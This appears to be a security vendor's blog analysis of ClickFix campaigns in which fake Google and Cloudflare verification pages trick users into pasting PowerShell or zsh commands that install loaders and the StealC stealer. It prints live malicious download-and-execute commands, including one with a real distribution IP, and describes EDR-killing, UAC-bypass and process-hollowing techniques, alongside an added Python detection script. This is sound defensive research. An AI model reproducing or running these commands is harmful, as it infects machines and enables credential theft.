ClickFix attacks, which trick people into running malicious commands themselves, continue to evolve. This latest campaign uses fake Google and Cloudflare verification pages to convince victims to infect their own devices.
A single mistake can install malware that steals passwords and other sensitive data, gives attackers remote access to your computer, or downloads additional malware that can take full control of your system.
We uncovered multiple campaigns using the same infrastructure to deliver malware including HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, and a Rust-based stealer.
In one infection chain, a trojanized version of the legitimate Franz messaging app downloads a previously undocumented loader dubbed ResiLoader, which disables security software before deploying the StealC infostealer.
Before we look at the technical details, here’s how to avoid becoming the next victim.
How to stay safe
ClickFix attacks rely on convincing you to run commands yourself. The safest approach is simple:
- Never copy and run commands from a website unless you’re following instructions from a trusted source and understand exactly what the command does.
- Be wary of verification pages. Google, Cloudflare, Microsoft, and other legitimate services will never ask you to paste PowerShell commands into Windows to prove you’re human or fix a problem.
- Don’t let urgency rush you. Fake verification pages often use countdown timers, visitor counters, or warnings to pressure you into acting quickly.
- Keep your security software up to date. Real-time protection and web protection can help block malicious websites before you reach them.
- Question unexpected technical instructions. If a website tells you to open PowerShell, Command Prompt, or Terminal, stop and verify the instructions through the company’s official support channels.
Pro tip: Malwarebytes Browser Guard can warn you when a website attempts to copy content to your clipboard—a common trick used by ClickFix pages.
Technical analysis
The campaigns analysed in this research have been active since at least late 2025 and use a variety of fake Google and Cloudflare pages to deliver malware. Although the lures differ, they share much of the same infrastructure and infection chain, with the attackers continually testing new delivery methods and payloads.
Different lures, one goal
Most of the campaigns share several characteristics:
- Use of the folder C:\ProgramData\Zooms to extract later stages
- PowerShell ClickFix commands that follow similar patterns
- Use of Cloudflare R2 buckets to deliver payloads
- IP addresses hosted by the ASN Dedik Services Limited
- HTML responses containing only the phrase "hehe"
These indicators have changed over time, so they don’t appear in every infection chain. The campaigns continue to evolve, with new payloads and delivery methods regularly introduced. For example, in some cases, the IP address is used directly for payload distribution instead of buckets.
The final command copied by the user usually falls into this pattern:
powershell -c "iex(irm '{IP}:{Port}/{Random Path}' -UseBasicParsing)"
The port and the path are not always present in the cases analyzed; the ports are random, but some of those observed are: 6600, 9900, 5506, 7895, 7493, 149, 8442.
To execute these commands, several ClickFix-related templates are used, mainly related to Google and Cloudflare. We also detected that in some cases the PowerShell command was distributed through the IClickFix framework.
We observed these ClickFix campaigns being distributed through:
- Old websites that have likely expired and been repurchased by the actor(s).
- CloudFlare Pages (.pages.dev domains).
- Compromised websites.
- Fake services, for example related to QR code or web file access.
Google ClickFix lures
The actors behind these campaigns use various Google-related HTML pages and kits.
One lure impersonates Google reCAPTCHA verification. The pages are hosted on random URLs that display fake or malicious content. These domains are often older registrations that recently began resolving to new IP addresses, suggesting they were repurposed for the campaign.
Some of these pages have URL parameters such as "zoneid", "cost", "device", "country", and "clickid", for example:
/conf/captcha.html?zoneid=10420852
/wincapbot/nobot.html
/xmr/trkuste.php?zone=5327134
bless.php?zoneid=10327549&clickid=1091581084925173761&cost=0.000000&country=US&device=desktop

In this case, the functions related to ClickFix are implemented in the class CustomCaptcha. The command is present in the clear, without any obfuscation.

Another distribution method uses Cloudflare Pages hosted on .pages.dev subdomains.

In this case, the HTML page is obfuscated by declaring several variables and XORing them. The deobfuscated code is called SECURITY GATEWAY and it’s composed of the functions GatewayRuntime, RemoteVault, BeaconDispatcher, Clipboard, TokenController, and PanelController.
The code allows the attackers to retrieve the command either remotely or locally. In this sample, the malicious PowerShell command is stored locally.

We also found that some of these domains have distributed another decoy in the past, in this case associated with an unauthorized Google login. This ClickFix lure asks the user to copy and paste the malicious command to set their device as primary.

The interesting part of this ClickFix kit is that it features an "approval gate," as described in the comments: the attacker must manually choose from the panel which command the user is made to execute.
In more recent campaigns, we’ve detected a ClickFix lure related to Google Meet, which requires copying and pasting a malicious command to fix audio issues.

In the analyzed cases, the endpoint /api/driver-clipboard.php returned the following malicious command:
{"mac":"curl -kfsSL $(echo '…'|base64 -D)|zsh","windows":"powershell -c "iex(irm '151.240.151.126/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)""}
Other lures
The actors behind this campaign use various kits and lures, mostly related to Google. However, we’ve detected other lures that copied commands related to the same infrastructure.
The attackers behind these campaigns also compromise multiple websites using different templates related to the CloudFlare ClickFix lure.
We have detected several templates used for CloudFlare pages. In the cases analyzed, the command is present in the clear or, in some cases, obfuscated.
We also detected some purpose-built fake service websites. For example, a "My QR Generator" site displays an obfuscated QR code and asks the user to run a PowerShell command to verify that they are not a robot.

In this case the command is encoded in base-64:
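As an added example (not code from the original post), the following Python snippet classifies process-creation command lines against the ClickFix downloader shape described earlier (iex(irm '{IP}:{Port}/{Random Path}' -UseBasicParsing)), decoding a -EncodedCommand base64 layer first where the lure ships an encoded command, as in the QR generator case. The regexes, the sample command lines and the 203.0.113.10 address are the editor's own assumptions, not indicators from the campaign.

```python
import base64
import re

# Editor's assumptions: the regex follows the command shape the article reports,
# powershell -c "iex(irm '{IP}:{Port}/{Random Path}' -UseBasicParsing)",
# with port and path optional; the long cmdlet names are accepted as well.
IEX_IRM = re.compile(
    r"(?:iex|invoke-expression)\s*\(\s*(?:irm|invoke-restmethod)\s+['\"]?"
    r"(?:https?://)?(?P<host>\d{1,3}(?:\.\d{1,3}){3})"
    r"(?::(?P<port>\d{1,5}))?(?P<path>/[^\s'\")]*)?",
    re.IGNORECASE,
)
# -EncodedCommand and its short forms carry base64 of a UTF-16LE script.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_layers(command_line):
    """Return the command line plus every -EncodedCommand layer it carries, decoded."""
    layers = [command_line]
    for m in ENCODED_FLAG.finditer(command_line):
        try:
            layers.append(base64.b64decode(m.group(1)).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 or not UTF-16LE text: skip this blob
    return layers

def classify(command_line):
    """Return the downloader target (host, port, path) or None if nothing matches."""
    for index, layer in enumerate(decode_layers(command_line)):
        m = IEX_IRM.search(layer)
        if m:
            return {"host": m["host"], "port": m["port"],
                    "path": m["path"], "encoded": index > 0}
    return None

def scan(command_lines):
    """Run classify() over process-creation command lines, keeping only the hits."""
    return [(line, hit) for line in command_lines if (hit := classify(line))]

# Constructed sample command lines (not from the article); 203.0.113.10 is a
# documentation address standing in for a real distribution IP.
TARGET = "203.0.113.10"
SAMPLES = [
    f"powershell -c \"iex(irm '{TARGET}:6600/rXQ2mZpLkV' -UseBasicParsing)\"",
    "powershell -NoProfile -EncodedCommand " + base64.b64encode(
        f"iex(irm '{TARGET}/n7Kd' -UseBasicParsing)".encode("utf-16-le")).decode(),
    f"powershell -c \"iex(irm '{TARGET}' -UseBasicParsing)\"",
    "powershell -c \"Get-Process | Sort-Object CPU -Descending\"",
]
```

Feeding Sysmon Event ID 1 or Windows 4688 command lines into scan() gives the host, port and path for each hit, which can then be compared against the IP and port list above.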

PowerShell downloader
The ClickFix command executed by the user decodes a script and drops it into the Temp folder with the name tmp{4 char}.tmp.ps1.
We have detected several variations of this script, but recent versions do the following:
- Create the folder C:\ProgramData\Zooms.
- Download the next stage from a CloudFlare bucket and save it in C:\ProgramData\Zooms. In some variants of the script, the next stage is downloaded directly from an IP.
- Send the information of the compromised machine to http://{IP}/dl-callback. In some variants of the script, this part is not present.

The attackers behind these campaigns use a large number of different payloads. The table below summarises some of the downloaded filenames and the malware they install. In many of the cases analyzed, the final payload was distributed via DLL hijacking, as we will also see later for the StealC stealer.
| File distributed | Malware distributed |
| --- | --- |
| libEGL.zip, Safe-1.zip | Trojanized Electron app, ResiLoader and StealC |
| Test.msi | Deno Loader and PowerShell Stealer |
| arworks.zip | Amatera Stealer |
| water-night.zip | Remus Stealer |
| Setup.msi, Invintrum_first.msi | NetSupport |
| traffic1.msi | CastleLoader |
| ibrowser.exe | Rust Stealer |
We analyzed a new loader called ResiLoader that ultimately distributes StealC. We also detected that in the latest campaigns the threat actor has started using Deno to distribute a stealer developed in PowerShell; the analysis of this infection chain could be the subject of a future blog post.
Trojanized Electron app downloads ResiLoader
In this case, the ZIP was downloaded from:
pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev/libEGL.zip
After extraction to:
C:\ProgramData\Zooms\libEGL.zip_ext
The zip contains a trojanized version of the open-source messaging app called “Franz”:

The malicious code is implemented in the index.js file:

The downloader performs the following operations:
- Decodes strings with the function HC().
- Reads readme.txt, expects a campaign key of the form AAAA-BBBB, and returns it as an array of tokens. In this case the name is resiloader-1, which is why we call the downloaded DLL "ResiLoader".
- Reads %APPDATA%\setup.txt; if absent, generates a random 8-char string and persists it.
- Obtains persistence using app.setLoginItemSettings.
- Sends a POST request to https[:]//completstep[.]com/api/ and processes the JSON response:
  - If task.e is present, it executes eval(task.e); this allows the attacker to execute arbitrary JavaScript code.
  - If task.files is present, it creates %TEMP%, decodes and writes each file; if any filename ends in .exe, it runs it via child_process.exec.
  - If
In our case we received a ZIP that performs the DLL hijacking of ssh-add.exe:
{"task":{"name":"JUNE18USY","files":{
"msys-2.0.dll":"",
"msys-crypto-3.dll":"",
"msys-gcc_s-seh-1.dll":"",
"ssh-add.exe":"" }}}
Afterwards, the executable was launched with:
C:\WINDOWS\system32\cmd.exe /d /s /c ""C:\Users\{user}\AppData\Local\Temp\1782122017599\ssh-add.exe""
ResiLoader
The msys-crypto-3.dll is an obfuscated .NET NativeAOT loader that implements AV/EDR evasion using a BYOD technique, obtains persistence, and ultimately loads the StealC stealer. We didn't find a specific attribution for this loader, so we called it "ResiLoader" based on the string in the readme.txt mentioned above.
The loader contains several strings, some clear and some encrypted. After decrypting the strings, it’s possible to have a full picture of the functionality of the ResiLoader.
MANPO: ReadModule len=...
MANPO: magicOffset=...
…
PERS: FAIL all file copies failed, skipping run key
PERS: FAIL both HKLM and HKCU Run key writes failed
…
RUNPE: CreateProcess failed
RUNPE: PEB patched
RUNPE: VirtualAllocEx failed
…
POST: RunForever exited (unexpected)
POST: entering RunForever
POST: hollow=
The loader performs the following operations:
- Extracts the encoded blob containing two payloads by reading the marker AtLorenBase and the length of the encoded blob. It then decodes the blob and decrypts the driver pcdhost.sys (OPSWAT AppRemover Driver) and the StealC payload using a custom decryption algorithm.
- Terminates more than 140 EDR/AV-related processes using the dropped driver.
- Performs a UAC bypass via the ICMLuaUtil elevated COM interface.
- Creates the folder C:\ProgramData\Google Update, copies itself there, and adds persistence using the Run registry key: cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe
In the end, the loader performs process hollowing of the process ServiceModelReg.exe to run the StealC stealer.
IOCs
Hash
Domains
Distribute ClickFix pages:
CloudFlare buckets used for payload distribution:
IPs
IP used for payload distribution: